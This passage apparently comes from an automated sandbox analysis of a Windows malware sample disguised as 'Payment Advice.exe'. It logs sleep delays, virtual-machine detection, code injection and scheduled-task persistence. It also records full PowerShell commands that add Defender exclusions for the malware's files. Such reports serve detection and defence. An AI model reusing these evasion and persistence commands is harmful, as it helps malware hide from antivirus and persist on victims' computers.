                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -95360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -95235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -95113s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -94985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -94860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -94619s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -94516s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -94406s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -94268s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -1199958s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -1199828s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -1199719s >= -30000s
                    Source: C:\Users\user\Desktop\Payment Advice.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Payment Advice.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 100000
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 99875
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 99766
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 99653
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 99530
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 99422
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 99312
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 99201
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 99049
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 98922
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 98812
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 98703
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 98594
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 98484
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 98375
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 98266
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 98156
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 98044
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 97937
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 97828
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 97714
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 97559
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 97453
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 97332
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 97203
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 97093
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 96984
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 96874
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 96766
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 96641
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 96531
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 96421
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 96312
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 96203
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 96094
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 95984
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 95875
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 95766
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 95656
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 95547
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 95437
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 95328
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 95219
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 95109
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 95000
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 94891
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 94781
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 94672
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 94562
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 94453
                    Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 94344
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 99874
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 99765
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 99656
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 99545
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 99437
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 99328
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 99218
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 99109
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 98996
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 98890
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 98780
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 98671
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 98562
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 98453
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 98343
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 98234
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 98117
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 98015
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 97906
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 97796
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 97687
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 97578
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 97466
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 97359
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 97249
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 97139
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 97030
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 96921
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 96812
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 96702
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 96593
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 96484
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 96374
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 96265
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 96156
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 96044
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 95937
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 95812
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 93076
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 92965
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 92858
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 92744
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 92640
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 92530
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 92421
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 92292
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 92148
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 92035
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Thread delayed: delay time: 91912
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99827
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99718
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99609
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99498
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99390
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99281
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99172
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99062
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98953
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98844
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98734
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98624
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98515
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98406
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98296
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98186
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98078
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97968
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97859
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97749
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97640
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97531
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97421
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97312
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97203
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97093
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96984
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96875
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96765
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96655
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96547
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96437
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96328
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96218
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96109
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96000
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95890
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95779
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95672
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95562
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95453
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95343
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95234
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95125
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95015
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 94906
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 94797
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 94687
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 94578
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99874
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99766
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99656
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99547
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99438
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99313
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99188
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99078
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98969
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98844
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98735
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98610
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98485
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98360
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98235
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98110
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97985
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97860
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97735
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97610
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97485
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97360
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97235
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97110
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96985
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96860
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96735
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96610
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96485
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96360
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96235
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 96110
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95985
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95860
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95735
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95610
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95485
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95360
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95235
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 95113
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 94985
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 94860
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 94619
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 94516
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 94406
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 94268
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199958
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199828
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199719
                    Source: BjTxJte.exe, 0000000E.00000002.1848048895.0000000000872000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\l
                    Source: BjTxJte.exe, 00000014.00000002.1936987872.0000000005500000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: BjTxJte.exe, 0000000E.00000002.1848048895.0000000000872000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                    Source: sFPEKzHsLkYZIz.exe, 00000009.00000002.1754542531.000000000152E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8
                    Source: BjTxJte.exe, 00000019.00000002.4119037268.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
                    Source: Payment Advice.exe, 00000000.00000002.1706697674.00000000012D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: om&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:L
                    Source: Payment Advice.exe, 00000008.00000002.4119763177.000000000103D000.00000004.00000020.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4116736214.0000000000E74000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\Payment Advice.exe Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\Payment Advice.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\Payment Advice.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"
                    Source: C:\Users\user\Desktop\Payment Advice.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Memory written: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\Payment Advice.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp"
                    Source: C:\Users\user\Desktop\Payment Advice.exe Process created: C:\Users\user\Desktop\Payment Advice.exe "C:\Users\user\Desktop\Payment Advice.exe"
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp7ACA.tmp"
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe Process created: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe "C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmpA082.tmp"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Process created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmpC03F.tmp"
                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002D75000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $^q3<b>[ Program Manager]</b> (18/04/2024 23:53:25)<br>
                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002D75000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002D75000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR^q
